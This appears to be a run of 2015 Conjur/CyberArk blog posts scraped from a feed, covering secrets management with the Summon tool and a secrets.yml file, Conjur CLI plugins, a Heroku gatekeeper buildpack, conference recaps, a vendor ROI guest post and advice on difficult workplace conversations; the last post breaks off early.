Today we’re releasing Summon, an open-source tool to help developers and sysadmins improve workflows that involve access to secrets. Secrets are hard. We can’t check them into source control, even though they are a dependency of every application. We also can’t treat secrets like configuration because storage and retrieval needs to be secure. Summon is a response to this in-between land.

Overview

Summon reads a file called secrets.yml, which is a mapping from environment variable names to secrets identifiers. Using a pluggable provider, it retrieves the values of those secrets and makes them available in the environment of a child process which you specify. The provider’s job is to retrieve the value of a secret based on its identifier. The process only needs to be able read environment variables: a webapp, deployment script or chef-client run, as examples. Once the process exits the environment variables do not remain on the system.

summon

Read more about the problem in our previous post.

Example

Let’s say we have a Fabric script to deploy our webapp1 to AWS. We want to record the status of the deployment for inspection later, so we’re inserting a record into MongoDB. We’ll need AWS keys and a MongoDB password to accomplish this. Let’s capture this in a secrets.yml file.

We can check this file into Git, there are no secrets in it. Now, anyone who clones the repo can immediately see which secrets the project requires and where they come from. The identifiers in secrets.yml are interpreted by the provider (driver), so they could be Conjur variables, names of secrets in the Keychain, etc.

Now we can wrap the Fabric call with Summon to provide these credentials.

summon --provider ./summon-conjur -f secrets.yml fab -e prod,webapp1 deploy

Note: The -e tag is specifying the tags of instances we want to deploy to, à la awsfabrictasks.

Providers

Summon uses pluggable providers to fetch secrets. A provider’s job is easy: given the identifier of a secret, return its value on stdout or an error message on stderr. We’ve written providers for Amazon S3, Conjur, and the OS X Keychain so far. You can download them from their respective GitHub pages. You can also write your own provider in any language; it can be as simple as a shell script. Summon takes care of interpreting the output.

Summon will also auto-discover providers placed in /usr/libexec/summon/. The path to a provider can also be specified via the –provider flag, as in the example above, or with the environment variable SUMMON_PROVIDER.

Go

Most of our development in-house is Ruby. The language allows us to be expressive and get things done quickly. Packaging Ruby applications, alas, is not fun. summon and the summon-conjur provider are written in Go because it allows us to package them as a single binary. Therefore, installing Summon takes only two steps: download the release for your platform and unzip it onto your system.

Give Summon a spin and let us know what you think. Open an issue or submit a pull request. We’ll have an open hangout later this month to talk about Summon. Let’s make this awesome together.

 

]]>
SecDevOps 2.0 | Managing Your Robot Army [SLIDESHARE] https://www.cyberark.com/blog/secdevops-2-0-managing-your-robot-army-slideshare/ Tue, 09 Jun 2015 16:15:00 +0000 https://cyberarkvx2.wpengine.com/blog/secdevops-2-0-managing-your-robot-army-slideshare/  

As we mentioned, our very own Josh Bregman had the amazing opportunity to speak in the DevOps Connect track at InfoSecurity Europe last week.

In case you weren’t lucky enough to see the presentation live in London we have included it for your viewing pleasure below.

If you have any questions or need clarification on the slides please feel free to ping Josh on Twitter.

 

]]>
Continuous Secrets Delivery https://www.cyberark.com/blog/continuous-secrets-delivery/ Fri, 05 Jun 2015 18:22:00 +0000 https://cyberarkvx2.wpengine.com/blog/continuous-secrets-delivery/  

Hanging out with the IT Crowd in London.

continuous-secrets-delivery

I’m sitting in the airport lounge in Madrid on my way back to Boston after a whirlwind 2 days at the Infosec Europe conference.  I was summoned into service at the last minute when Elizabeth unfortunately wasn’t able to make the trip, and I took her speaking spot at the DevOps exchange.  I’ve been at Conjur for just a few weeks so this was my first opportunity to really interact with the DevOps community personally.

First of all, I want to thank Alan Schimmel from DevOps.com and Wai Man Yau from Sonatype for both being exceptionally gracious hosts for the events.  Wai Man and the entire Sonatype crew including Josh Corman were a blast to hang out with.  Thanks to them (and a few pints) – project Cauldron is dead – long live project Summon.  A great example of failing fast and an judgement free post mortem on my talk.

I also had the great pleasure of meeting Justin Arbuckle from Chef and watching his presentation.  I’ve always been a fan of Jim Collins’ – Good to Great – so I loved Justin’s talk entitled “Velocity is your Hedgehog, Compliance is your Fox”.  Justin’s idea is that one thing that DevOps enabled enterprises know is velocity – faster, faster, faster.  This idea is what drives the flywheel….keep pushing, and pushing, until it takes off.  Compliance is the fox means that compliance concerns will constantly come up and will need to be addressed, but NOT at the expense of velocity.  Easier said than done to be sure.

After my talk, Justin said that he liked the concept of Continuous Secrets Delivery that I discussed in my talk.  Continuous Secrets Delivery is a methodology that we’ve found works across customers and industries to ensure that secrets management isn’t the hurdle that trips up the team and ruins your velocity.

By following this approach, teams can avoid adding to their security debt that ultimately makes the information security folks call a timeout on their project.

Here it is:

Define a Policy

Much has been said about the cultural challenges of bring Dev and Ops and Security together towards a common goal, but there needs to be basic alignment on which people and code, based upon their role, need access to which secrets.  This policy should be collectively reviewed and committed to source control.  The configuration of that policy should be strictly codified – as in the case of Conjur’s Policy DSL – but regardless of format, this step is critical.  Information security doesn’t always want to say “No”, so it’s their responsibility to be proactive, and give guidance on how to apply their risk management framework and best practices to secrets management.

“Get Your Secrets into Source Control”

This is the working tagline of project Summon.  The idea is that you create a secrets.yml file for each project (application or service). This file declares the secrets that the  software needs access to, and into which environment variable each piece of secret data should be “summoned”.  The secrets.yml file has no actual secrets in it, and can safely be checked into source control.

The “summon” command line tool can then be used to launch the application, container or service. For example:

# Start Rack-based server app (e.g. in an upstart script)
$ summon rackup
# Run a Dockerized app
$ summon docker run 
   -d 
   -e SSL_PRIVATE_KEY_FILE 
   -e SSL_CERT_FILE 
   -e DB_PASSWORD 
   myapp

Create Host Factories

A host factory is a mechanism for “lifting” a new host (machine, container, or PaaS application) into a privileged computing role. For example, Conjur’s Host Factory generates a new host (machine) identity and grants it a specific set of roles.  Getting this right is of critical importance in achieving velocity with compliance.  If there are any manual steps in this process – like changing network settings or manual approvals – then you can’t go fast.  If every machine has the same identity, that’s obviously fast, but is it secure?  All of those machine’s audit records will have the same identifier.  This calls out for something dynamic like a token service (OAuth Dynamic Client Registration) or Conjur Host Factory to allow machines and or tool chains to automate in a secure fashion the assigning of the correct identity.

Make it Highly Available

In the Summon model, the system that provides the secret is called a “secrets provider”.  This service needs to be highly available and performant across entire infrastructure, including multi-cloud, multi-region, and hybrid cloud environments.  To be fast, the secrets need to be securely distributed to the processing environment of the application.

Integrate with the DevOps Toolchain

The final step in scaling out the application it to integrate with the other tools in the toolchain; for example Puppet, Chef, SaltStack, Ansible, AWS, Docker, Heroku, Kubernetes, etc.  Conjur provides integration libraries for many of these.

Ironically, many teams start with the last step, and try to turn their configuration management system or cloud storage service into a secrets server.  Configuration management tools weren’t built for this task.  There is an expression “Sometimes when all you have is a hammer, everything looks like a nail.”   Using configuration management for secrets management is a sure fire way to slow the velocity of your project. Gaining alignment up front can be organizationally and culturally challenging, but it’s the only path forward to maintain velocity and compliance.  It’s a much easier conversation to have than AFTER something bad happens or information security won’t allow the application to go into production because they find plain text database passwords in Jenkins log files, Chef data bags, Puppet Hiera, Github repos or an S3 bucket.

This 5 step process of Continuous Secrets Delivery has been born out from years of experience solving this problem across customers and technologies, but we want to hear from you.  What’s your process?  Did we miss anything?

 

]]>
Josh Bregman Presenting at DevOps Connect in London https://www.cyberark.com/blog/josh-bregman-presenting-at-devops-connect-in-london/ Wed, 03 Jun 2015 17:25:00 +0000 https://cyberarkvx2.wpengine.com/blog/josh-bregman-presenting-at-devops-connect-in-london/  

Our very own Josh Bregman will be speaking in London at Infosecurity Europe this Thursday, June 4 at 2:30 GMT.  His talk, SecDevOps 2.0 – Managing your Robot Army, will focus on how a security orchestration system is the foundation of SecDevOps 2.0. Josh will also be previewing Cauldron, an open source project for integrating secrets into DevOps toolchains. This is some pretty exciting stuff, you definitely don’t want to miss it!

Josh will be in London all week and would love to meet with you and get your take on the world of DevOps and Security. Want to meet up with Josh at #InfoSec15? Contact him at josh.bregman@conjur.net and schedule a time to chat about all things DevOps. Josh loves connecting on twitter and wants to follow you. Tweet to him @kingoauth during or after his session…. Don’t forget to use #Infosec15Conjur!

Josh is thrilled to be attending DevOps Connect. With 20 years of experience successfully architecting, evangelizing, and delivering innovative identity management and security products to customers he can’t wait to join the DevOps security conversation.

See Josh Speak at DevOps Connect in London

]]>
Guest Post: Nucleus Research Assesses ROI Business Case of the CyberArk Privileged Account Security Solution https://www.cyberark.com/blog/guest-post-nucleus-research-assesses-roi-business-case-of-the-cyberark-privileged-account-security-solution/ Tue, 02 Jun 2015 13:06:24 +0000 https://www.cyberark.com/blog//

By Rebecca Wettemann, VP of Research, Nucleus Research

When it comes to IT security initiatives, many enterprises struggle to quantify business value and return on investment (ROI), viewing them solely as an insurance expense – a must-have in today’s era of inevitable attacks. But by implementing the right solutions, organizations can mitigate a multitude of security challenges while enabling business agility and achieving measurable operational benefits.

Industry experts estimate that 80 to 100 percent of serious security incidents involve the exploitation of privileged accounts. To understand how organizations can better protect themselves against advanced threats, my team at Nucleus Research recently explored a series of actual deployments of the CyberArk Privileged Account Security Solution. During a number of in-depth customer conversations, we not only found that the company’s suite of security tools drove a centralized and consistent approach to managing privileged access for reduced risk, but also significant business benefits, including increased productivity and reduced costs. We found that organizations can achieve complete payback from an initial CyberArk deployment within six months or less and gain greater ROI as the CyberArk platform is used over time.

Our discussion series revealed that while security remains a primary driver, there are three compelling reasons why customers were drawn to the CyberArk solution, including:

  • Ease of deployment, intuitive administrative interface and the ability to manage all privileged credentials in one vault enabled administrators to rapidly come up to speed on the solution and gain benefit.
  • Because customers could choose one initial area or component to address and extend the solution easily as they needed over time, they were able to flexibly respond to changing security needs with limited additional investment or disruption.
  • Integrated solution approach. Companies moving from multiple point solutions with disparate interfaces found the centralized platform drove greater management efficiencies and ease of reporting.

Additionally, we identified four key benefits companies achieved from deploying the CyberArk Privileged Account Security Solution, including:

  • Reduced risk: Most customers cited reduced risk as one of the most important benefits of deploying CyberArk.
  • Improved compliance: We found improved compliance with the ability to easily address audit requirements was a common benefit shared by all CyberArk customers.
  • Increased productivity: Automating privileged credentials management and password change processes enabled customers to reduce administrator time spent on credentials management by 20 to 50 percent or more.
  • Reduced audit costs: We found CyberArk customers could reduce resources and time dedicated to auditing by up to 40 percent.

To read real customer anecdotes detailing their success while using the CyberArk integrated solution, along with our full analysis of the CyberArk Privileged Account Security Solution, please visit www.CyberArk.com/ROI.

]]>
Get Your Secrets Into Source Control https://www.cyberark.com/blog/get-your-secrets-into-source-control/ Fri, 29 May 2015 18:41:00 +0000 https://cyberarkvx2.wpengine.com/blog/get-your-secrets-into-source-control/  

“Get your secrets into source control!”

That may seem like rather strange advice, but it’s exactly what we’re going to try and do. Allow me to explain!

Agile and DevOps are setting the world on fire, and there are plenty of problems that are yet to be solved. But one thing everyone can agree on is that the more stuff which is tracked in source control, the better.

 However, secrets aren’t safe in source control, which means that they often live an independent existence outside of the mainstream code/commit/test/deploy workflows.

At Conjur, we’re building a simple, extensible software tool that will provide the best of both worlds: better security by moving secrets out of source control, combined with the convenience of having secrets in source control. We’re not quite ready to release the software, but we are ready to discuss (and get your feedback on) the requirements and design goals. So please read on…

The Problem:

The first problem that ensues when secrets are separated from source control is that it’s not even clear which secrets are needed to run an application. Once you checkout the repository, you either have to dig through the documentation (which is hopefully current), or start monkey-testing the app to figure out what’s needed to get it to work.

Once you figure out what secrets you need, you have to obtain them. You may have some already, in another directory. You may copy them over into the new project, maybe have to reformat them a little bit. It may turn out that your secret is expired, and you’re stuck hunting it down anew. You may ask a fellow team member to provide you with a secret that you don’t have; frequently these secrets are sent over insecure transport media like email and chat.

Next, the application may not be expecting the secrets to be provided by the environment. If the secrets are embedded into configuration files, it’s not even enough for you to have the secret; you have to find the right file and place the secret there. Keeping secrets in configuration files is a practice that needs to be phased out; you can read a further exposition of this point of view at 12factor.net/config. Summon works best with 12factor applications; in fact it strongly pushes in this direction. That means predictability for developers, operations and security folks.

Overall, ad-hoc secrets management is a big pain, and the only reason that anybody tolerates is that they are used to it.

The Solution:

Well, let’s create a better way. The new standard for secrets in code, which we’re calling Summon, has the following design:

summon-conjur

  • Secrets are declared explicitly in a safe source code file that gets committed along with the rest of the project code. We’ll call it secrets.yml. secrets.yml contains the names of secrets, but not the actual values.

  • Secrets are injected into the application when it’s launched.

  • By default, secrets are obtained from the process environment. However, secrets may also be placed in files for the application to read.

  • Secrets are physically stored in a secure location which is not the source control repository. The specifics of secrets storage and retrieval are abstracted, so that the application code is not explicitly tied to the secrets provider. In other words, there’s a swappable secrets backend, which decouples the infrastructure code from the secrets provider.

  • Different secrets providers can be used in development, stage and production without having to modify the deployment artifacts (e.g. installer packages, VM images, container images).

  • Summon runs anywhere, it’s lightweight, it’s easy to install.

  • It’s simple and easy to develop new backend providers.

We’re still a few weeks away from an official release, but we are ready for you to get involved!  Simply click the button below and fill out the form and we’ll let you know when Summon is ready (we promise not to spam you with marketing emails):

We look forward to solving this tough problem together with you all!

]]>
Josh Bregman Joins Conjur! https://www.cyberark.com/blog/josh-bregman-joins-conjur/ Thu, 21 May 2015 19:40:00 +0000 https://cyberarkvx2.wpengine.com/blog/josh-bregman-joins-conjur/  

I almost passed on Netegrity.

I called them and said I wasn’t coming.   When you’re 25 and it’s the beginning of the dot com boom, there is a never ending sea of “opportunities”.   I had accepted the Netegrity offer but another one came in that seemed better.  My dad, who is a very smart guy, said “Josh, you gave them your word.”  He probably didn’t know that Netegrity would go on to define and lead (for a while)  what became the multi-billion dollar Identity and Access Management market.

Good thing he’s from the Mid West, because his homespun advice rang true and I decided to join Netegrity as a Senior Engineer in 1999.   I’ve worked in and around the space for the last 15 years – a very nice ride indeed.

Conjur is the next Netegrity.

The parallels are striking.  In 1999 there was a huge shift that was changing the way that companies built applications: the Internet.  In 2015, there is a huge shift in the way that companies build applications: DevOps.  In the early days of Netegrity, people were saying things like “I can build it myself, I have Apache”.  Today, in my early days at Conjur, people are saying things like “I can build it myself, I have Consul”.  Netegrity landed some key early deals like GE and Daimler and the thing took off like a rocket ship.  Conjur already has Netflix and Novartis.  The rocket ship is fueling up and I wanted to get on for another ride.

Conjur is DevOps Security….done.

Conjur offers a solution to a very real problem.  Companies across all verticals – even those that are historically technology laggards like retail and insurance- are going to great lengths to bring DevOps to their organizations.  This is more than just a fad – it is a fundamental shift in the way in which companies build applications. The existing security tools and vendors can’t be accepted by DevOps and the DIY and open-source projects can’t be endorsed by information security.  There is a hole in the market, and Conjur is filling it.

At the end of the day,  the most striking thing about Netegrity and my experience there was just how many really smart people worked there and how, 15 years later, the ex-Netegrity folks still have had an impact on the industry.  It’s my belief that this will be the biggest parallel of them all – that Conjur will be the epicenter of DevOps security and I will have been very lucky to have been there from the beginning.     Thanks Kevin and Elizabeth for the opportunity.

Please contact me at josh.bregman@conjur.net or @kingoauth if you’d like a seat on the rocketship next to us!

Josh has 20 years of experience successfully architecting, evangelizing, and delivering innovative identity management and security products to customers. Before joining Conjur, Josh spent  a decade as a solutions and pre-sales leader in the Oracle ecosystem.  In his early career josh worked as a software engineer at IBM, GTE Labs, and Netegrity.  He has two U.S. patents and received a B.A. in Math from the University of Rochester in 1995.

]]>
Extending Conjur with Plugins https://www.cyberark.com/blog/extending-conjur-with-plugins/ Mon, 11 May 2015 16:28:00 +0000 https://cyberarkvx2.wpengine.com/blog/extending-conjur-with-plugins/  

Conjur comes with a great set of features out of the box. But what if you need to add new functionality or change how Conjur does something to better fit your needs? You can do this with Conjur plugins. In this post I’ll cover when you may want to use Conjur plugins is, how they work , and show you how you can get started with your own plugins.

When would I use a plugin?

Here are a few use cases where a plugin can be helpful.

1. You want to administer a service that uses or modifies Conjur resources. For example, the aws plugin allows you to create an AWS IAM role with permission to read a Conjur host factory token stored in S3.

2. You want to abstract a common pattern into a higher-level workflow. Let’s say you have a data analytics team in your organization that uses several third party services and needs to store their credentials in Conjur. You want them to store the credentials in a uniform way: in a specific format with the correct roles granted access. You can write a plugin for your analytics team that prompts them for the service, username and password. The plugin would create the variable and grant the correct permissions to your groups and layers.

3. You want to augment an existing Conjur command. The audit-send plugin is an example of this pattern. It adds a send subcommand to the audit command that allows you to send custom audit events to Conjur.

4. You want to modify an existing Conjur command. For example, you can enforce a namespacing scheme for variables in your organization by modifying conjur variable create command to suggest and enforce a namespace like division/product/service/api-key.

How do plugins work?

Conjur CLI plugins are implemented as Ruby gems. They use the naming scheme conjur-asset-<plugin-name>. When you install a plugin, the gem is installed into the CLI package’s embedded Ruby and a marker is placed in your conjurrc file. Any commands the plugin defines are then available the next time you run the CLI.

Here is an example – we will install the proxy plugin. It allows you to simply add Conjur authentication headers on outbound requests.

 

After installation, the proxy plugin is available to use the same way you’d use other Conjur commands. You can read more about how to use proxy here.

How do I write a Conjur plugin?

Conjur plugins use the GLI library for command-line parsing. To write your own plugin, you inherit from the Conjur::Command class. This gives you access to the api object, a client you can use to make calls to Conjur. The client is authenticated as the user/host that is logged into the CLI.

Here is a simple example, an application of the first use case above, with Jenkins:

 

Now you can launch builds in Jenkins, if your user has access to the jenkins/api-key variable. Access to the API key is managed and audited with Conjur.

We have released several plugins already that you can use as examples to work from. Here are the ones we use most often internally.

audit-send – Send custom audit events
host-factory – Bootstrap hosts into layers (read more)
proxy – Simple HTTP proxy that adds Conjur authentication headers

All of our plugins are open-source and hosted on Github. The Conjur CLI is also open-source.

Let us know what great plugins you create or use!

 

]]>
A Software Defined Firewall for Heroku https://www.cyberark.com/blog/a-software-defined-firewall-for-heroku/ Thu, 07 May 2015 20:53:00 +0000 https://cyberarkvx2.wpengine.com/blog/a-software-defined-firewall-for-heroku/  

Traditional IT environments are protected with perimeter software like the good ol’ VPN. In the cloud setting, the one, all-encompassing VPN is replaced with (or supplemented by) a more granular set of interlocking “security groups” (to use AWS parlance).

In the world of PaaS, containers and microservices, security groups themselves are obsolete. Why? Because application containers are distributed across a near-uniform cluster of servers or virtual machines. The topology of container placement onto host machines is constantly shifting and changing. In the older world, application code could be segregated from the database servers by a network boundary. In a PaaS architecture, these containers can (and likely will) run side-by-side on the same host OS.

Yet, network security can’t simply be abandoned as a relic of a bygone age. At Conjur, our customers are hitting this problem head-on as they move rapidly towards PaaS and Docker. They’re asking us for a “software-defined firewall”: a perimeter-like barrier with granularity as fine as individual containers. And to meet their continuous delivery objectives, it needs to deliver a convenient workflow and user experience for developers, operations, security, and compliance teams.

As an example of how we approach this problem, we’re now providing a Heroku buildpack which can be used to add a software-defined firewall in front of any Heroku application or web service. It’s available at https://github.com/conjurinc/heroku-buildpack-conjur, and it works like this (full README available in Github).

  • First, make sure you are on the Heroku cedar-14 stack

  • Then configure buildpacks to combine your base buildpack (e.g. Ruby or Node.js) with the Conjur buildpack.

  • Next, configure your application to listen to /tmp/nginx.socket for new connections, and to touch /tmp/app-initialized when it’s ready to receive traffic.

  • Finally, configure the application with the id of a Conjur resource; inbound requests will need to have specific privileges on this resource in order to be passed through.

When your app starts up, it’s now running behind a gatekeeper which is selectively filtering inbound traffic according to Conjur RBAC and privilege grants.

From a technical standpoint, here’s how the system works.

Software Defined Firewall for Cloud-based PaaS

  1. The client authenticates with Conjur, and obtains a bearer token. To eliminate latency, tokens can be prefetched so that a token is already available when the client needs it.

         a.  The icon with 4 circles represents the token

         b.  The client can be a person, or code (e.g. another service)

  2. The client sends an outbound HTTPS request, with the token on the Authorization header.

  3. The gatekeeper receives the inbound request. The gatekeeper constructs a request to the Conjur authorization service, with the client’s Authorization token on this request.

         a.  The brick wall represents the gatekeeper

  4. Conjur receives the authorization request, and verifies the token to obtain the client identity. Then, Conjur checks whether the client identity has the necessary privilege on the gatekeeper resource.

  5. Conjur responds with an HTTP status code indicating if the request should be allowed.

  6. The gatekeeper caches this response, so that the authorization cost does not have to be repeated for each client request.

  7. If Conjur allows the request, then it is submitted to the protected Heroku application or service. The request is processed, and the response goes back to the client.

Example

Let’s see the gatekeeper in action. Conjur’s release-bot is a webservice which deploys Conjur artifacts to destinations like RubyGems, NPM, and Heroku. release-bot runs in Heroku, and access to it is controlled by the Gatekeeper buildpack. It has a simple REST interface:

  • POST /npm/releases release to NPM

  • POST /rubygems/releases release to RubyGems

  • DELETE /rubygems/releases/:name yank a Ruby gem

  • POST /heroku/releases push a Heroku app

A Conjur webservice resource called production/release-bot-2.0 is used to protect access to the release-bot. In accordance with the Gatekeeper, POST methods require create privilege on the resource, and the DELETE method requires update privilege. The webservice resource, along with the client roles, are defined in this policy file. The policy file is loaded using Conjur tools, once for each environment (development, stage, production).

The Jenkins server is enabled to perform code pushes. This is a simple process:

  1. The Jenkins layer is granted the role production/release-bot-2.0/publisher. This gives Jenkins hosts (both master and slaves) permission to read and create releases.

  2. Jenkins jobs are created to perform releases; for example release-rubygems. This job operates by authenticating with Conjur (using the Jenkins host credentials), then POST-ing to the release-bot

Screen Shot 2016-11-08 at 10.04.48 AM.png

  1. A Jenkins promotion step is created on appropriate projects, such as the Conjur CLI for Ruby, which invokes the release-rubygems job

Screen Shot 2016-11-08 at 10.05.01 AM.png

As a result, there’s a clean separation of duties:

  • Jenkins performs build and test, and creates artifacts

  • release-bot deploys artifacts into production

In addition, the Conjur development team has permission to invoke release-bot to perform any necessary manual administration of releases; for example, yanking a Gem, or re-invoking a push which has failed for some reason.

Neither Jenkins nor the Conjur development team have direct access to the deployment credentials, such as the RubyGems and Heroku API keys; yet can easily and securely perform the release functions.

Summary

At Conjur, we are working hard with our customers and the broader DevOps community to learn how to make tools and processes that give developers, operations, and security teams the power that they need to move fast and make decisions, without sacrificing security or transparency. Here’s how the Conjur gatekeeper feels to each member of the DevOps + continuous delivery team.

For developers, the gatekeeper enables them to remove HTTP(S) authentication from their application. This is great for development, because development servers can be built and tested against each other with security disabled. Also, because each app has its own built-in gatekeeper, there’s no single point of failure “global authentication server” which might limit the scalability or flexibility of the deployed application.

Security people get a uniform traffic authorization architecture that applies across the entire system. They know that each application will be protected in the same way, and they don’t need to vet the authentication and authorization systems that would otherwise be built into many different projects.

It’s also a nice solution for operations, because the build machine is going to generate application images which, although they don’t have built-in security, can be deployed to production without any modification.

Compliance people gain the assurance that communication between services is individually authorized. The system is no longer a big blob of services communicating freely between each other; it’s a defined, controlled set of interactions, each of which are independently authorized and audited. Furthermore, because Conjur provides role-based access control and permissions reporting, they can determine at any time which people and code have specific privileged access.

 

]]>
Difficult Conversations and DevOps https://www.cyberark.com/blog/difficult-conversations-and-devops/ Wed, 06 May 2015 16:24:00 +0000 https://cyberarkvx2.wpengine.com/blog/difficult-conversations-and-devops/  

Successful DevOps has as much to do with culture as it does with the specific tools used to continuously deliver code.  While tools are easy to learn about, evaluate, and select, culture is a much more difficult beast to quantify. It is easy to say you are working to improve internal communication and collaboration but it is another thing to actually do it–especially when part of that necessary communication comes in the form of difficult conversations.  Based on the framework from the book, ‘Difficult Conversations‘, the goal of this blog post is to give you some structure as you tackle these communication challenges on your quest for DevOps supremacy.

6259008111_654cc4293f_z

As suggested in the book, every difficult conversation is essentially three different conversations: one that is spoken and two that are unspoken.  The spoken conversation is referred to as the ‘What Happened‘ conversation and will be the focus of this blog post.

In the ‘What Happened‘ conversation people tend to argue over who’s right, place blame, and make assumptions about each side’s intentions.  I’m sure you’ve been in a meeting where a post-mortem is being conducted and instead of going through a ‘5 Why’s‘ or taking a deeper dive into the project, the conversation jumps into a finger pointing session.  So, why does this happen so frequently?  Human nature?  Lack of structure?  Yes on both counts.  You can’t ignore some facts about how we humans come to create our inferences:

  • We often have access to different data than the others in the conversation.
  • We often select based on our own interests, assumptions, and biases.
  • We often interpret based on our own past experiences and implicit rules.
  • As a result we often come to different conclusions.

We see this chain of events occur more often than not in a developing DevOps environment.  With stakeholders from Dev, Ops, Security, HR, Finance, and the C-Suite involved there are a lot of agendas, assumptions, and interpretations that can negatively impact an organization’s ability to stay ahead of the competition and improve their internal processes at the same time.

During these difficult conversations we often end up arguing over who’s right and who’s wrong…however,the truth usually lies somewhere in between.  So, how do we move away from this vicious cycle and work towards a more helpful habit of solving problems collaboratively?  Here are 3 steps that will help you shift the conversation to facts and away from judgments, emotions, interpretations, and expectations.

Shift from Arguing to Inquiring

The first step is to stop blaming and start inquiring.  Instead of snap judgments, think about the questions you can ask that will get to the heart of the matter, the facts of the situation.  As you can imagine, we are looking for open-ended questions at this stage.  The goal is to be able to define their story as much as you can define yours.  By going through this exercise via open-ended questions you will better discover each party’s perceptions and interpretations of what ‘the truth’ is.

Here are some open-ended questions that should help facilitate this step in the process:

  • Would you tell me more about _______ ?
  • I’m not sure I understand, can you give me an example?
  • When you say ________, what do you mean?
  • Why is that important to you?
  • What kind of information do you need in order to move forward?
  • How are you feeling about all of this?

These types of questions will get you started, but beware, blame lurks below most of these discussions.  Blame is a dangerous and sometimes catastrophic variable that can plague organizations for long periods of time. It causes people to cover up information and mistakes, it permanently damages relationships, and it allows problems to persist for far too long because they aren’t accurately diagnosed.  The next step of this process sets its sights on blame and, once again, works to shift the conversation.

Shift from Blame to Contribution

To avoid the ‘blame game’ it is vital to move all involved parties towards actively contributing to a solution.  Contribution assumes a few things: everyone can contribute something to the solution, our purpose is to fix a problem, not assign blame, and by understanding contributions we will learn what to do differently going forward.

Contributions can come in all forms and should be heavily focused on facts not perceptions.  In a typical DevOps environment there can be a lot of innate perceptions that will work against contribution.  Devs are perceived not to plan or do due diligence, Ops are perceived to move too slowly and are usually a bottleneck, and security is perceived as too ‘outside of the process’ to be viewed as a primary stakeholder.  By re-framing the conversation around contribution and business goals, you increase the probability of aligning the team and moving the project forward.

Separate Intentions from Impact

Intentions can be a tricky matter.  It is human nature to make up attributions about other people’s intentions based on how they could potentially impact us.  If that isn’t dangerous enough, while making these attributions, we often assume the worst which can easily put two parties on opposite sides of the table during a difficult conversation.  What most of us fail to realize is that, although other’s intentions are usually invisible to us, they are often much closer to our own intentions then we realize.  Therefore, it is imperative that we begin to separate intentions from impact.

In this framework there are 3 steps to successfully separating intentions from impact:

  1. Observe Your Own Attributions:  What data is this based on?
  2. Understand that Intentions are Complex: People regularly act with good, bad, mixed, or no intentions at all.
  3. Don’t Assume Intentions: This is key but in order to avoid this trap you need to make sure you communicate potential intentions and share how they could directly impact you.

For DevOps to truly create trust between human and technical interactions there is a need for difficult conversations.  The ‘What Happened’ conversation will span across all departmental lines and be a true litmus test to see if your overall corporate culture can sustain a DevOps mindset and action plan.  As in any system, this framework is only as effective as its weakest link, so by having leadership not only buy-in, but also effectively communicate in this fashion, you dramatically increase your chances of sustainable success.

So the next time you find yourself in a ‘What Happened‘ type of meeting or conversation, remember to ask yourself these important questions:

  • What is my story?  What is their story?
  • What have we each contributed to this situation?
  • How can we fix things going forward?
  • What assumptions am I making about their intentions?
  • What is the impact on me?
  • How can I communicate this to them in an effective way?

This type of communication is contagious within an organization. Start today and master these essential, yet difficult, conversations.

If you’re interested in learning more about the cultural aspect of DevOps please click on the link below and answer a few questions.  Your feedback will allow us to continue to create helpful content for you in the future.

 

]]>
Privilege Was Everywhere at the RSA Conference https://www.cyberark.com/blog/privilege-was-everywhere-at-the-rsa-conference/ Thu, 30 Apr 2015 18:14:15 +0000 https://www.cyberark.com/blog//

We’re back from a whirlwind week at the RSA Conference – and what a week it was! This year broke attendance records as security pros from around the globe traveled to San Francisco to listen to more than 700 speakers in more than 400 sessions on a wide range of topics from today’s dramatic infosec talent shortage to the critical need to keep our kids safer online to our own popular session on “Privileged Account Exploits – the Point of No Return.” Now that we’re back – and in between catching up on email (and sleep!) – we reflect on some of this year’s highlights:

Numerous sessions, panels and one-on-one conversations throughout the conference underscored the hard, cold truth that attackers will find a way to get inside your organization, no matter how you try to stop them. As the focus has shifted to the battle within the network, many security researchers, practitioners and vendors alike have observed a common attack link: privileged account exploits. So while you don’t know who and you don’t know when, you do know what motivated attackers are after. This year, we saw a surge of attendees seeking innovative ways to break the attack chain by defending what really matters. And from the moment the show floor opened to the second it closed, the CyberArk booth was jam-packed with people participating in interactive demonstrations of our Privileged Account Security Solution to learn how to better protect against, detect and respond to attacks, before they strike vital systems and jeopardize business.

Privileged accounts grant extensive control over sensitive data and IT systems. They’re pervasive in every organization, they’re often over-looked and they can be powerful weapons in the wrong hands. Recent, highly publicized pass-the-hash attacks targeting privileged accounts from Anunak/Carbanak to Sands show how these exploits have grown increasingly sophisticated. So it’s no wonder our RSA session, “Privileged Account Exploits – the Point of No Return,” delivered by Adam Bosnian and Yair Sade was so crowded – we couldn’t even get into the room to take a picture! In addition to exploring a series of real-world attack scenarios and pinpointing the common attack denominator, attendees walked away with actionable steps for stopping advanced threats by blocking the privileged account pathway.

Privileged account credential security – or lack thereof – was a highly prevalent discussion driver throughout the week. In fact, CSO’s Steve Ragan pointed to insecure credentials as one of the top three themes for the whole show. He cites an RSA talk that revealed millions of point-of-sale (POS) systems used around the world are vulnerable today because they are protected by the same default password that hasn’t been changed for 20 years. Making matters worse, many of these vendor’s customers have never changed this password on their PoS systems once they have shipped. This revelation is just one example of how off-the-shelf software has exacerbated the already complex privileged account challenge for organizations. Edward Snowden may have said it best when he remarked to HBO’s John Oliver earlier this month in an interview from Russia, “Bad passwords are one of the easiest ways to compromise a system. For someone who has a very common, eight-character password, it can literally take less than a second for a computer to go through the possibilities and pull that password out.”

PrivilegePinAnd last but not least, the accessory du jour at this year’s RSA Conference was the blue CyberArk “Privilege Is Everywhere” pin, which helped illustrate the pervasiveness of privileged accounts throughout the enterprise – from a network’s infrastructure to applications and into the cloud – and reflect a top-of-mind challenge for many RSA attendees this year.

Thanks to our customers, colleagues and peers for another fantastic RSA show. See you next year!

]]>
What is a DevOps Secrets Server? https://www.cyberark.com/blog/what-is-a-devops-secrets-server/ Tue, 28 Apr 2015 15:12:00 +0000 https://cyberarkvx2.wpengine.com/blog/what-is-a-devops-secrets-server/  

 There was a lot of interest in Square’s announcement of the open sourcing of their “system for managing and distributing secrets” called Keywhiz.  The discussion on Hacker News revealed at least two other open source projects – Sneaker and CredStash – that also provided similar types of capabilities by leveraging some of the built in capabilities of the AWS platform.

The emergence of these projects and the strong follow-on interest is validation of the need for a new type of technology called a “DevOps Secrets Server”.  In case you missed it, Conjur’s CEO Elizabeth Lawler spoke about this in her talk at RSA. This is part of what she called SecDevOps 2.0 – the formalization of proper security controls for DevOps workflows and the applications they deliver.

So what is a DevOps Secrets Server?  Here are some key points:

End to end encryption

